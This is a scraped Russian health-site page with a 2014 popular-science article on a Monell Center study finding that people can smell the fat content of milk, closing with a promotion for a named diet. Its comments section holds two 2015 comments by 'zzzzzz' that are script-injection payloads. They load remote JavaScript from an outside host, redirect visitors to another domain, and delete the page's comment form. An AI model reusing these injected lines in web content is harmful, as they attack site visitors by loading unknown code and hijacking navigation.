Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Принюхайтесь! Ваш нос пом...  >>  Принюхайтесь! Ваш нос поможет вам похудеть
 
Обратная связь
 

Принюхайтесь! Ваш нос поможет вам похудеть

Размер шрифта
02 июня 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые из Америки обнаружили, что человек с помощью обоняния может обнаруживать жир в пище.

Принюхайтесь! Ваш нос поможет вам похудеть

«Поверьте, мы серьезно недооцениваем роль обоняния в нашей повседневной жизни», – рассказывает доктор Йохан Лундстрем, нейрофизиолог из Центра Монелл (Филадельфия, штат Пенсильвания), который целиком посвящен изучению человеческого восприятия вкуса и запаха. «Тот факт, что с помощью носа мы можем выявить наличие жира в еде и даже определить примерное его содержание, указывает эволюционную значимость этой способности».

Поскольку жир является наиболее энергетически ценным питательным веществом, наши древние предки были явно заинтересованы в нем. Таким образом, чуткое обоняние становилось эволюционным преимуществом, ведь с помощью него можно было найти источник столь ценного продукта на определенном расстоянии.

К сожалению, ученые до сих пор не знают, какие именно сенсорные системы участвуют в распознавании «жирного» запаха.

В некоторых предыдущих исследованиях было показано, что обоняние чувствительно к жиру в концентрированной форме. Однако до сих пор было неясно, может ли оно учуять жир в более реальном антураже (например, в составе пищи).

Ответ на этот вопрос как раз-таки и искали ученые из Центра Монелл. С этой целью они собрали группу добровольцев и попросили их понюхать несколько образцов молока различной жирности (0,125%, 1,4% и 2,7%).

Ученые выстроили эксперимент следующим образом: каждому испытуемому было предложено три чашки. В двух из них было налито молоко одинаковой жирности, а в третьей – другое. Добровольцы должны были на нюх определить, какой образец отличается от двух прочих.

Эксперимент был проведен трижды, и каждый раз в нем принимали участие разные люди. Первыми выступили здоровые добровольцы с нормальным весом из окрестностей Филадельфии. Второй эпизод эксперимента осуществлялся на территории с принципиально иным культурологическим антуражем – в Вагенингенском округе Нидерландов. Наконец, авторы вновь вернулись в Филадельфию, и в этом раз позвали в качестве испытуемых в том числе и людей с лишним весом.

Выяснилось, что территориальный фактор никак не влиял на способность определять содержание жира в еде. И это несмотря на то, что голландцы традиционно пьют больше молока, чем жители Северной Америки.

Масса тела также оказалась статистически незначимым фактором.

«Теперь нам нужно определить конкретные молекулы в составе жирной пищи, которые стимулируют обонятельный анализатор. Известно, что молекулы жира сами по себе не являются летучими, поэтому вряд ли мы ощущаем носом именно их», – говорит Санни Босвельд, глава исследовательской группы. «Предстоит сложнейший биохимический анализ, по итогам которого, надеемся, нам удастся найти «виновника»

Что ж, мы и не сомневались, что нос чует жирное. Достаточно пройти мимо «Макдоналдса», чтобы полной грудью вдохнуть всю палитру неземных ароматов, которые буквально вопят о зашкаливающем содержании жира.

В «Диете Елены Малышевой» жира ровно столько, сколько нужно для здоровья. Равно как и всех остальных питательных веществ. Именно поэтому «Диета» является самым сбалансированным и полезным способом сбросить лишнее.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - pomk93

06 июня 2014 в 09:47

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:38

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:36

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Старт нового сезона проекта «Сбрось лишнее»   Бойтесь своих друзей, если хотите похудеть   Выключите компьютер! Из-за него вы толстеете!   Диета по группе крови – полный обман! Как реально похудеть?  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом!
 
21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть! 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 

Слайдшоу

1
Может ли кофе сжечь жир?
Как похудеть, ничего не делая
Как натренировать волю и похудеть?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Какое мороженное съесть, чтобы похудеть
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.